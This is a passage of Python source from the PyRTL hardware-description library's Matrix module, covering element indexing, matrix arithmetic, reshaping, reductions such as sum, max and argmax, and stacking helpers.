or rows.start < 0 or rows.stop < 0:
raise PyrtlError("Invalid bounds for rows. Max rows: %s, got: %s" % (
str(self.rows), str(rows.start) + ":" + str(rows.stop)))
if columns.start > self.columns or columns.stop > self.columns \
or columns.start < 0 or columns.stop < 0:
raise PyrtlError("Invalid bounds for columns. Max columns: %s, got: %s" % (
str(self.columns), str(columns.start) + ":" + str(columns.stop)))
# If it's a single value we want to return a wirevector
if rows.stop - rows.start == 1 and \
columns.stop - columns.start == 1:
return as_wires(self._matrix[rows][0][columns][0],
bitwidth=self.bits)
# Otherwise set up matrix and return that
result = [[0 for _ in range(columns.stop - columns.start)]
for _ in range(rows.stop - rows.start)]
for i in range(len(result)):
for j in range(len(result[0])):
result[i][j] = self._matrix[i + rows.start][j + columns.start]
return Matrix(len(result), len(result[0]), self._bits,
signed=self.signed, value=result, max_bits=self.max_bits)
# Second case when we just want to get full row
if isinstance(key, int):
if key < 0:
start = self.rows - abs(key)
if start < 0:
raise PyrtlError('Index %d is out of bounds for '
'matrix with %d rows' % (key, self.rows))
key = slice(start, start + 1, None)
else:
key = slice(key, key + 1, None)
return self[key, :]
# Third case when we want multiple rows
if isinstance(key, slice):
return self[key, :]
# Otherwise improper value was passed
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(key), type(key)))
def __setitem__(self, key, value):
''' Mutator for the matrix.
:param (slice/int rows, slice/int columns) key: The key value to set
:param Wirevector/int/Matrix value: The value in which to set the key
Called when setting a value using square brackets (e.g. `matrix[a, b] = value`).
The value given will be truncated to match the bitwidth of all the elements
in the matrix.
'''
if isinstance(key, tuple):
rows, columns = key
# First ensure that slices are correct
if not isinstance(rows, slice):
if not isinstance(rows, int):
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(rows), type(rows)))
rows = slice(rows, rows + 1, 1)
if not isinstance(columns, slice):
if not isinstance(columns, int):
raise PyrtlError('Columns must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(columns), type(columns)))
columns = slice(columns, columns + 1, 1)
if rows.start is None:
rows = slice(0, rows.stop, rows.step)
elif rows.start < 0:
rows = slice(self.rows - abs(rows.start),
rows.stop, rows.step)
if rows.stop is None:
rows = slice(rows.start, self.rows, rows.step)
elif rows.stop < 0:
rows = slice(rows.start, self.rows - abs(rows.stop),
rows.step)
if columns.start is None:
columns = slice(0, columns.stop, columns.step)
elif columns.start < 0:
columns = slice(self.columns - abs(columns.start),
columns.stop, columns.step)
if columns.stop is None:
columns = slice(columns.start, self.columns, columns.step)
elif columns.stop < 0:
columns = slice(
columns.start, self.columns - abs(columns.stop),
columns.step)
# Check Slice Bounds
if rows.start > self.rows or rows.stop > self.rows \
or rows.start < 0 or rows.stop < 0:
raise PyrtlError("Invalid bounds for rows. Max rows: %s, got: %s" % (
str(self.rows), str(rows.start) + ":" + str(rows.stop)))
if columns.start > self.columns or columns.stop > self.columns \
or columns.start < 0 or columns.stop < 0:
raise PyrtlError("Invalid bounds for columns. Max columns: %s, got: %s" % (
str(self.columns), str(columns.start) + ":" + str(columns.stop)))
# First case when setting value to Matrix
if isinstance(value, Matrix):
if value.rows != (rows.stop - rows.start):
raise PyrtlError(
'Value rows mismatch. Expected Matrix '
'of rows "%s", instead recieved Matrix of rows "%s"' %
(str(rows.stop - rows.start), str(value.rows)))
if value.columns != (columns.stop - columns.start):
raise PyrtlError(
'Value columns mismatch. Expected Matrix '
'of columns "%s", instead recieved Matrix of columns "%s"' %
(str(columns.stop - columns.start), str(value.columns)))
for i in range(rows.stop - rows.start):
for j in range(columns.stop - columns.start):
self._matrix[rows.start + i][columns.start + j] =\
as_wires(value[i, j], bitwidth=self.bits)
# Second case when setting value to wirevector
elif isinstance(value, (int, WireVector)):
if ((rows.stop - rows.start) != 1) or \
((columns.stop - columns.start) != 1):
raise PyrtlError(
'Value mismatch: expected Matrix, instead received WireVector')
self._matrix[rows.start][columns.start] = as_wires(value, bitwidth=self.bits)
# Otherwise Error
else:
raise PyrtlError('Invalid value of type %s' % type(value))
else:
# Second case if we just want to set a full row
if isinstance(key, int):
if key < 0:
start = self.rows - abs(key)
if start < 0:
raise PyrtlError('Index %d is out of bounds for '
'matrix with %d rows' % (key, self.rows))
key = slice(start, start + 1, None)
else:
key = slice(key, key + 1, None)
self[key, :] = value
# Third case if we want to set full rows
elif isinstance(key, slice):
self[key, :] = value
else:
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(key), type(key)))
def copy(self):
''' Constructs a deep copy of the Matrix.
:return: a Matrix copy
'''
return Matrix(self.rows, self.columns, self.bits,
value=self.to_wirevector(), max_bits=self.max_bits)
def __iadd__(self, other):
''' Perform the in-place addition operation.
        :return: a Matrix object with the elementwise addition being performed
Is used with `a += b`. Performs an elementwise addition.
'''
new_value = (self + other)
self._matrix = new_value._matrix
self.bits = new_value._bits
return self.copy()
def __add__(self, other):
''' Perform the addition operation.
:return: a Matrix object with the element wise addition being performed
Is used with `a + b`. Performs an elementwise addition.
'''
if not isinstance(other, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(other))
if self.columns != other.columns:
raise PyrtlError('error: columns mismatch. '
                             'Matrix a: %s columns, Matrix b: %s columns' %
(str(self.columns), str(other.columns)))
elif self.rows != other.rows:
raise PyrtlError('error: row mismatch. '
                             'Matrix a: %s rows, Matrix b: %s rows' %
(str(self.rows), str(other.rows)))
new_bits = self.bits
if other.bits > new_bits:
new_bits = other.bits
result = Matrix(self.rows, self.columns, new_bits + 1, max_bits=self.max_bits)
for i in range(result.rows):
for j in range(result.columns):
result[i, j] = self[i, j] + other[i, j]
return result
def __isub__(self, other):
        ''' Perform the in-place subtraction operation.
:Matrix other: the PyRTL Matrix to subtract
        :return: a Matrix object with the elementwise subtraction being performed
Is used with `a -= b`. Performs an elementwise subtraction.
'''
new_value = self - other
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __sub__(self, other):
''' Perform the subtraction operation.
:Matrix other: the PyRTL Matrix to subtract
:return: a Matrix object with the elementwise subtraction being performed
Is used with `a - b`. Performs an elementwise subtraction.
Note: If using unsigned numbers, the result will be floored at 0.
'''
if not isinstance(other, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(other))
if self.columns != other.columns:
raise PyrtlError('error: columns mismatch. '
                             'Matrix a: %s columns, Matrix b: %s columns' %
(str(self.columns), str(other.columns)))
if self.rows != other.rows:
raise PyrtlError('error: row mismatch. '
                             'Matrix a: %s rows, Matrix b: %s rows' %
(str(self.rows), str(other.rows)))
new_bits = self.bits
if other.bits > new_bits:
new_bits = other.bits
result = Matrix(self.rows, self.columns, new_bits, max_bits=self.max_bits)
for i in range(result.rows):
for j in range(result.columns):
if self.signed:
result[i, j] = self[i, j] - other[i, j]
else:
result[i, j] = select(self[i, j] > other[i, j],
self[i, j] - other[i, j],
Const(0))
return result
def __imul__(self, other):
''' Perform the in-place multiplication operation.
:param Matrix/Wirevector other: the Matrix or scalar to multiply
        :return: a Matrix object with the resulting multiplication operation being performed
Is used with `a *= b`. Performs an elementwise or scalar multiplication.
'''
new_value = self * other
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __mul__(self, other):
''' Perform the elementwise or scalar multiplication operation.
:param Matrix/Wirevector other: the Matrix to multiply
:return: a Matrix object with the resulting multiplication operation being performed
Is used with `a * b`.
'''
if isinstance(other, Matrix):
if self.columns != other.columns:
raise PyrtlError('error: columns mismatch. '
                                 'Matrix a: %s columns, Matrix b: %s columns' %
(str(self.columns), str(other.columns)))
if self.rows != other.rows:
                raise PyrtlError('error: row mismatch. '
                                 'Matrix a: %s rows, Matrix b: %s rows' %
(str(self.rows), str(other.rows)))
bits = self.bits + other.bits
elif isinstance(other, WireVector):
bits = self.bits + len(other)
else:
raise PyrtlError('Expecting a Matrix or WireVector '
'got %s instead' % type(other))
result = Matrix(self.rows, self.columns, bits, max_bits=self.max_bits)
for i in range(self.rows):
for j in range(self.columns):
if isinstance(other, Matrix):
result[i, j] = self[i, j] * other[i, j]
else:
result[i, j] = self[i, j] * other
return result
def __imatmul__(self, other):
        ''' Performs the in-place matrix multiplication operation.
:param Matrix other: the second matrix.
:return: a PyRTL Matrix that contains the matrix multiplication product of this and other
Is used with `a @= b`.
Note: The matmul symbol (@) only works in python 3.5+. Otherwise you must
call `__imatmul__(other)`.
'''
new_value = self.__matmul__(other)
self.columns = new_value.columns
self.rows = new_value.rows
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __matmul__(self, other):
''' Performs the matrix multiplication operation.
:param Matrix other: the second matrix.
:return: a PyRTL Matrix that contains the matrix multiplication product of this and other
Is used with `a @ b`.
Note: The matmul symbol (@) only works in python 3.5+. Otherwise you must
call `__matmul__(other)`.
'''
if not isinstance(other, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(other))
if self.columns != other.rows:
raise PyrtlError('error: rows and columns mismatch. '
'Matrix a: %s columns, Matrix b: %s rows' %
(str(self.columns), str(other.rows)))
result = Matrix(self.rows, other.columns,
self.columns * other.rows * (self.bits + other.bits),
max_bits=self.max_bits)
for i in range(self.rows):
for j in range(other.columns):
for k in range(self.columns):
result[i, j] = mult.fused_multiply_adder(
self[i, k], other[k, j], result[i, j], signed=self.signed)
return result
def __ipow__(self, power):
''' Performs the matrix power operation.
        :param int power: the power to raise the matrix to
:return: a PyRTL Matrix that contains the matrix power product
Is used with `a **= b`.
'''
new_value = self ** power
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __pow__(self, power):
''' Performs the matrix power operation.
        :param int power: the power to raise the matrix to
:return: a PyRTL Matrix that contains the matrix power product
Is used with `a ** b`.
'''
if not isinstance(power, int):
raise PyrtlError('Unexpected power given. Type int expected, '
                             'but received type %s' % type(power))
if self.rows != self.columns:
raise PyrtlError("Matrix must be square")
result = self.copy()
# First case: return identity matrix
if power == 0:
for i in range(self.rows):
for j in range(self.columns):
if i != j:
result[i, j] = Const(0)
else:
result[i, j] = Const(1)
return result
# Second case: do matrix multiplications
if power >= 1:
inputs = [result] * power
def pow_2(first, second):
return first.__matmul__(second)
return reduce(pow_2, inputs)
raise PyrtlError('Power must be greater than or equal to 0')
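    # Illustrative sketch (not part of the original class): matrix powers.
    #
    #   m = Matrix(2, 2, 4, value=[[1, 2], [3, 4]])
    #   ident = m ** 0   # 2 x 2 identity matrix
    #   cubed = m ** 3   # equivalent to m @ m @ m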
def put(self, ind, v, mode='raise'):
''' Replace specified elements of the matrix with given values
:param int/list[int]/tuple[int] ind: target indices
:param int/list[int]/tuple[int]/Matrix row-vector v: values to place in
            matrix at target indices; if v is shorter than ind, its last
            element is repeated as necessary
        :param str mode: how out-of-bounds indices behave; 'raise' raises an
            error, 'wrap' wraps around, and 'clip' clips to the range
Note that the index is on the flattened matrix.
'''
count = self.rows * self.columns
if isinstance(ind, int):
ind = (ind,)
elif not isinstance(ind, (tuple, list)):
raise PyrtlError("Expected int or list-like indices, got %s" % type(ind))
if isinstance(v, int):
v = (v,)
if isinstance(v, (tuple, list)) and len(v) == 0:
return
elif isinstance(v, Matrix):
if v.rows != 1:
raise PyrtlError(
"Expected a row-vector matrix, instead got matrix with %d rows" % v.rows
)
if mode not in ['raise', 'wrap', 'clip']:
raise PyrtlError(
"Unexpected mode %s; allowable modes are 'raise', 'wrap', and 'clip'" % mode
)
def get_ix(ix):
if ix < 0:
ix = count - abs(ix)
if ix < 0 or ix >= count:
if mode == 'raise':
raise PyrtlError("index %d is out of bounds with size %d" % (ix, count))
elif mode == 'wrap':
ix = ix % count
elif mode == 'clip':
ix = 0 if ix < 0 else count - 1
return ix
def get_value(ix):
if isinstance(v, (tuple, list)):
if ix >= len(v):
return v[-1] # if v is shorter than ind, repeat last as necessary
return v[ix]
elif isinstance(v, Matrix):
            if ix >= v.columns:
return v[0, -1]
return v[0, ix]
for v_ix, mat_ix in enumerate(ind):
mat_ix = get_ix(mat_ix)
row = mat_ix // self.columns
col = mat_ix % self.columns
self[row, col] = get_value(v_ix)
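    # Illustrative sketch (not part of the original class): put() indexes the
    # flattened matrix, so index 3 of a 2 x 2 matrix is row 1, column 1.
    #
    #   m = Matrix(2, 2, 4, value=[[1, 2], [3, 4]])
    #   m.put(3, 9)               # m is now [[1, 2], [3, 9]]
    #   m.put([0, 1], (7,))       # v shorter than ind: last value 7 is repeated
    #   m.put(4, 5, mode='clip')  # out-of-bounds index clips to index 3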
def reshape(self, *newshape, order='C'):
''' Create a matrix of the given shape from the current matrix.
:param int/ints/tuple[int] newshape: shape of the matrix to return;
if a single int, will result in a 1-D row-vector of that length;
if a tuple, will use values for number of rows and cols. Can also
be a varargs.
:param str order: 'C' means to read from self using
row-major order (C-style), and 'F' means to read from self
using column-major order (Fortran-style).
:return: A copy of the matrix with same data, with a new number of rows/cols
One shape dimension in newshape can be -1; in this case, the value
for that dimension is inferred from the other given dimension (if any)
and the number of elements in the matrix.
Examples::
int_matrix = [[0, 1, 2, 3], [4, 5, 6, 7]]
matrix = Matrix.Matrix(2, 4, 4, value=int_matrix)
matrix.reshape(-1) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape(8) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape(1, 8) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape((1, 8)) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape((1, -1)) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape(4, 2) == [[0, 1], [2, 3], [4, 5], [6, 7]]
matrix.reshape(-1, 2) == [[0, 1], [2, 3], [4, 5], [6, 7]]
matrix.reshape(4, -1) == [[0, 1], [2, 3], [4, 5], [6, 7]]
'''
count = self.rows * self.columns
if isinstance(newshape, int):
if newshape == -1:
newshape = (1, count)
else:
newshape = (1, newshape)
elif isinstance(newshape, tuple):
if isinstance(newshape[0], tuple):
newshape = newshape[0]
if len(newshape) == 1:
newshape = (1, newshape[0])
if len(newshape) > 2:
raise PyrtlError("length of newshape tuple must be <= 2")
rows, cols = newshape
if not isinstance(rows, int) or not isinstance(cols, int):
raise PyrtlError(
"newshape dimensions must be integers, instead got %s" % type(newshape)
)
if rows == -1 and cols == -1:
raise PyrtlError("Both dimensions in newshape cannot be -1")
if rows == -1:
rows = count // cols
newshape = (rows, cols)
elif cols == -1:
cols = count // rows
newshape = (rows, cols)
else:
raise PyrtlError(
"newshape can be an integer or tuple of integers, not %s" % type(newshape)
)
rows, cols = newshape
if rows * cols != count:
raise PyrtlError(
"Cannot reshape matrix of size %d into shape %s" % (count, str(newshape))
)
if order not in 'CF':
raise PyrtlError(
"Invalid order %s. Acceptable orders are 'C' (for row-major C-style order) "
"and 'F' (for column-major Fortran-style order)." % order
)
value = [[0] * cols for _ in range(rows)]
ix = 0
if order == 'C':
# Read and write in row-wise order
for newr in range(rows):
for newc in range(cols):
r = ix // self.columns
c = ix % self.columns
value[newr][newc] = self[r, c]
ix += 1
else:
# Read and write in column-wise order
for newc in range(cols):
for newr in range(rows):
r = ix % self.rows
c = ix // self.rows
value[newr][newc] = self[r, c]
ix += 1
return Matrix(rows, cols, self.bits, self.signed, value, self.max_bits)
def flatten(self, order='C'):
''' Flatten the matrix into a single row.
:param str order: 'C' means row-major order (C-style), and
'F' means column-major order (Fortran-style)
:return: A copy of the matrix flattened in to a row vector matrix
'''
return self.reshape(self.rows * self.columns, order=order)
def multiply(first, second):
''' Perform the elementwise or scalar multiplication operation.
:param Matrix first: first matrix
:param Matrix/Wirevector second: second matrix
    :return: a Matrix object with the elementwise or scalar multiplication being performed
'''
if not isinstance(first, Matrix):
raise PyrtlError('error: expecting a Matrix, '
                         'got %s instead' % type(first))
return first * second
def sum(matrix, axis=None, bits=None):
''' Returns the sum of all the values in a matrix
:param Matrix/Wirevector matrix: the matrix to perform sum operation on.
If it is a WireVector, it will return itself
:param None/int axis: The axis to perform the operation on
        None refers to the sum of all items. 0 is the sum of each column. 1 is the sum of each row. Defaults to None
:param int bits: The bits per value of the sum. Defaults to bits of old matrix
:return: A wirevector or Matrix representing sum
'''
def sum_2(first, second):
return first + second
if isinstance(matrix, WireVector):
return matrix
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or Wirevector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
if axis is None:
inputs = []
for i in range(matrix.rows):
for j in range(matrix.columns):
inputs.append(matrix[i, j])
return reduce(sum_2, inputs)
if axis == 0:
result = Matrix(1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
inputs = []
for j in range(matrix.rows):
inputs.append(matrix[j, i])
result[0, i] = reduce(sum_2, inputs)
return result
if axis == 1:
result = Matrix(1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
inputs = []
for j in range(matrix.columns):
inputs.append(matrix[i, j])
result[0, i] = reduce(sum_2, inputs)
return result
raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
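# Illustrative sketch (not part of the original module): axis semantics for
# sum(); min() and max() below follow the same pattern.
#
#   m = Matrix(2, 3, 4, value=[[1, 2, 3], [4, 5, 6]])
#   total = sum(m)             # a single WireVector holding 21
#   col_sums = sum(m, axis=0)  # 1 x 3 Matrix: [[5, 7, 9]]
#   row_sums = sum(m, axis=1)  # 1 x 2 Matrix: [[6, 15]]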
def min(matrix, axis=None, bits=None):
''' Returns the minimum value in a matrix.
:param Matrix/Wirevector matrix: the matrix to perform min operation on.
If it is a WireVector, it will return itself
:param None/int axis: The axis to perform the operation on
        None refers to the min of all items. 0 is the min of each column. 1 is the min of each row. Defaults to None
:param int bits: The bits per value of the min. Defaults to bits of old matrix
:return: A WireVector or Matrix representing the min value
'''
def min_2(first, second):
return select(first < second, first, second)
if isinstance(matrix, WireVector):
return matrix
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or Wirevector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
if axis is None:
inputs = []
for i in range(matrix.rows):
for j in range(matrix.columns):
inputs.append(matrix[i, j])
return reduce(min_2, inputs)
if axis == 0:
result = Matrix(1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
inputs = []
for j in range(matrix.rows):
inputs.append(matrix[j, i])
result[0, i] = reduce(min_2, inputs)
return result
if axis == 1:
result = Matrix(1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
inputs = []
for j in range(matrix.columns):
inputs.append(matrix[i, j])
result[0, i] = reduce(min_2, inputs)
return result
raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
def max(matrix, axis=None, bits=None):
''' Returns the max value in a matrix.
:param Matrix/Wirevector matrix: the matrix to perform max operation on.
If it is a wirevector, it will return itself
:param None/int axis: The axis to perform the operation on
        None refers to the max of all items. 0 is the max of each column. 1 is the max of each row.
Defaults to None
:param int bits: The bits per value of the max. Defaults to bits of old matrix
:return: A WireVector or Matrix representing the max value
'''
def max_2(first, second):
return select(first > second, first, second)
if isinstance(matrix, WireVector):
return matrix
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or WireVector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
if axis is None:
inputs = []
for i in range(matrix.rows):
for j in range(matrix.columns):
inputs.append(matrix[i, j])
return reduce(max_2, inputs)
if axis == 0:
result = Matrix(
1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
inputs = []
for j in range(matrix.rows):
inputs.append(matrix[j, i])
result[0, i] = reduce(max_2, inputs)
return result
if axis == 1:
result = Matrix(
1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
inputs = []
for j in range(matrix.columns):
inputs.append(matrix[i, j])
result[0, i] = reduce(max_2, inputs)
return result
raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
def argmax(matrix, axis=None, bits=None):
''' Returns the index of the max value of the matrix.
:param Matrix/Wirevector matrix: the matrix to perform argmax operation on.
If it is a WireVector, it will return itself
:param None/int axis: The axis to perform the operation on.
        None refers to the argmax of all items. 0 is the argmax of each column. 1 is the argmax of each row.
Defaults to None
:param int bits: The bits per value of the argmax. Defaults to bits of old matrix
:return: A WireVector or Matrix representing the argmax value
NOTE: If there are two indices with the same max value, this function
picks the first instance.
'''
if isinstance(matrix, WireVector):
return Const(0)
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or Wirevector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
max_number = max(matrix, axis=axis, bits=bits)
if axis is None:
index = Const(0)
arg = matrix.rows * matrix.columns - 1
for i in reversed(range(matrix.rows)):
for j in reversed(range(matrix.columns)):
index = select(
max_number == matrix[i, j], Const(arg), index)
arg -= 1
return index
if axis == 0:
result = Matrix(
1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
local_max = max_number[0, i]
index = Const(0)
arg = matrix.rows - 1
for j in reversed(range(matrix.rows)):
index = select(
local_max == matrix[j, i], Const(arg), index)
arg -= 1
result[0, i] = index
return result
if axis == 1:
result = Matrix(
1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
local_max = max_number[0, i]
index = Const(0)
arg = matrix.columns - 1
for j in reversed(range(matrix.columns)):
index = select(
local_max == matrix[i, j], Const(arg), index)
arg -= 1
result[0, i] = index
        return result
    raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
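# Illustrative sketch (not part of the original module): argmax() returns
# indices into the flattened matrix, and ties resolve to the first occurrence.
#
#   m = Matrix(2, 3, 4, value=[[1, 9, 3], [4, 9, 6]])
#   idx = argmax(m)              # WireVector holding 1 (the first 9, flattened)
#   col_idx = argmax(m, axis=0)  # 1 x 3 Matrix: [[1, 0, 1]]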
def dot(first, second):
''' Performs the dot product on two matrices.
:param Matrix first: the first matrix
:param Matrix second: the second matrix
:return: a PyRTL Matrix that contains the dot product of the two PyRTL Matrices
    Specifically, the dot product of two matrices is:
    * If either first or second is a WireVector, or has both rows and columns
      equal to 1, it is equivalent to an elementwise multiply
    * If both first and second are vectors (i.e. have rows or columns equal
      to 1), it is the inner product of the vectors.
    * Otherwise it is the matrix multiplication between first and second
NOTE: Row vectors and column vectors are both treated as arrays
'''
if not isinstance(first, (WireVector, Matrix)):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(first))
if not isinstance(second, (WireVector, Matrix)):
raise PyrtlError('error: expecting a Matrix/WireVector, '
'got %s instead' % type(second))
# First case when it is multiply
if isinstance(first, WireVector):
if isinstance(second, WireVector):
return first * second
return second[:, :] * first
if isinstance(second, WireVector):
return first[:, :] * second
if (first.rows == 1 and first.columns == 1) \
or (second.rows == 1 and second.columns == 1):
return first[:, :] * second[:, :]
# Second case when it is Inner Product
if first.rows == 1:
if second.rows == 1:
return sum(first * second)
if second.columns == 1:
return sum(first * second.transpose())
elif first.columns == 1:
if second.rows == 1:
return sum(first * second.transpose())
if second.columns == 1:
return sum(first * second)
# Third case when it is Matrix Multiply
return first.__matmul__(second)
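# Illustrative sketch (not part of the original module): the three dot() cases.
#
#   row = Matrix(1, 3, 4, value=[[1, 2, 3]])
#   col = Matrix(3, 1, 4, value=[[4], [5], [6]])
#   inner = dot(row, col)  # vector x vector -> inner product WireVector (32)
#   a = Matrix(2, 2, 4, value=[[1, 2], [3, 4]])
#   b = Matrix(2, 2, 4, value=[[5, 6], [7, 8]])
#   prod = dot(a, b)       # full matrices -> same as a @ b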
def hstack(*matrices):
""" Stack matrices in sequence horizontally (column-wise).
:param list[Matrix] matrices: a list of matrices to concatenate one after another horizontally
:return Matrix: a new Matrix, with the same number of rows as the original, with
a bitwidth equal to the max of the bitwidths of all the matrices
All the matrices must have the same number of rows and same 'signed' value.
For example::
m1 = Matrix(2, 3, bits=5, value=[[1,2,3],
[4,5,6]])
m2 = Matrix(2, 1, bits=10, value=[[17],
                                          [23]])
m3 = hstack(m1, m2)
m3 looks like::
[[1,2,3,17],
[4,5,6,23]]
"""
if len(matrices) == 0:
raise PyrtlError("Must supply at least one matrix to hstack()")
if any([not isinstance(matrix, Matrix) for matrix in matrices]):
raise PyrtlError("All arguments to hstack must be matrices.")
if len(matrices) == 1:
return matrices[0].copy()
new_rows = matrices[0].rows
if any([m.rows != new_rows for m in matrices]):
raise PyrtlError("All matrices being hstacked together must have the same number of rows")
new_signed = matrices[0].signed
if any([m.signed != new_signed for m in matrices]):
raise PyrtlError("All matrices being hstacked together must have the same signedness")
new_cols = builtins.sum(m.columns for m in matrices)
new_bits = builtins.max(m.bits for m in matrices)
new_max_bits = builtins.max(m.max_bits for m in matrices)
new = Matrix(new_rows, new_cols, new_bits, max_bits=new_max_bits)
new_c = 0
for matrix in matrices:
for c in range(matrix.columns):
for r in range(matrix.rows):
new[r, new_c] = matrix[r, c]
new_c += 1
return new
def vstack(*matrices):
""" Stack matrices in sequence vertically (row-wise).
:param list[Matrix] matrices: a list of matrices to concatenate one after another vertically
:return Matrix: a new Matrix, with the same number of columns as the original, with
a bitwidth equal to the max of the bitwidths of all the matrices
All the matrices must have the same number of columns and same 'signed' value.
For example::
m1 = Matrix(2, 3, bits=5, value=[[1,2,3],
[4,5,6]])
m2 = Matrix(1, 3, bits=10, value=[[7,8,9]])
m3 = vstack(m1, m2)
m3 looks like::
[[1,2,3],
[4,5,6],
[7,8,9]]
"""
if len(matrices) == 0:
raise PyrtlError("Must supply at least one matrix to hstack()")
if any([not isinstance(matrix, Matrix) for matrix in matrices]):
raise PyrtlError("All arguments to vstack must be matrices.")
if len(matrices) == 1:
return matrices[0].copy()
new_cols = matrices[0].columns
if any([m.columns != new_cols for m in matrices]):
raise PyrtlError("All matrices being vstacked together must have the "
"same number of columns")
new_signed = matrices[0].signed
if any([m.signed != new_signed for m in matrices]):
raise PyrtlError("All matrices being hstacked together must have the same signedness")
new_rows = builtins.sum(m.rows for m in matrices)
new_bits = builtins.max(m.bits for m in matrices)
new_max_bits = builtins.max(m.max_bits for m in matrices)
new = Matrix(new_rows, new_cols, new_bits, max_bits=new_max_bits)
new_r = 0
for matrix in matrices:
for r in range(matrix.rows):
for c in range(matrix.columns):
new[new_r, c] = matrix[r, c]
new_r += 1
return new
def concatenate(matrices, axis=0):
""" Join a sequence of matrices along an existing axis.
:param list[Matrix] matrices: a list of matrices to concatenate one after another
:param int axis: axis along which to join; 0 is horizontally, 1 is vertically (defaults to 0)
:return: a new Matrix composed of the given matrices joined together
This function essentially wraps hstack/vstack.
"""
if axis == 0:
return hstack(*matrices)
elif axis == 1:
return vstack(*matrices)
else:
raise PyrtlError("Only allowable axes are 0 or 1")
def matrix_wv_to_list(matrix_wv, rows, columns, bits):
''' Convert a wirevector representing a matrix into a Python list of lists.
:param WireVector matrix_wv: result of calling to_wirevector() on a Matrix object
:param int rows: number of rows in the matrix matrix_wv represents
:param int columns: number of columns in the matrix matrix_wv represents
:param int bits: number of bits in each element of the matrix matrix_wv represents
:return list[list[int]]: a Python list of lists
This is useful when printing the value of a wire you've inspected
during Simulation that you know represents a matrix.
Example::
values = [[1, 2, 3], [4, 5, 6]]
rows = 2
cols = 3
bits = 4
m = Matrix.Matrix(rows, cols, bits, values=values)
output = Output(name='output')
output <<= m.to_wirevector()
sim = Simulation()
sim.step({})
raw_matrix = Matrix.matrix_wv_to_list(sim.inspect('output'), rows, cols, bits)
print(raw_matrix)
# Produces:
# [[1, 2, 3], [4, 5, 6]]
'''
value = bin(matrix_wv)[2:].zfill(rows * columns * bits)
result = [[0 for _ in range(columns)]
for _ in range(rows)]
bit_pointer = 0
for i in range(rows):
for j in range(columns):
int_value = int(value[bit_pointer: bit_pointer + bits], 2)
result[i][j] = int_value
bit_pointer += bits
return result
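# Quick standalone illustration of the unpacking above: since the function
# only slices the binary string of an integer, it also accepts the raw int
# inspected from a simulation. For rows=1, columns=3, bits=4:
#
#     matrix_wv_to_list(0b000100100011, 1, 3, 4)   # -> [[1, 2, 3]]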
def list_to_int(matrix, n_bits):
''' Convert a Python matrix (a list of lists) into an integer.
:param list[list[int]] matrix: a pure Python list of lists representing a matrix
:param int n_bits: number of bits to be used to represent each element; if an
element doesn't fit in n_bits, it truncates the most significant bits
:return int: an integer encoding the elements of `matrix` across N*n_bits bits,
where N is the number of elements in `matrix`
Integers that are signed will automatically be converted to their two's complement form.
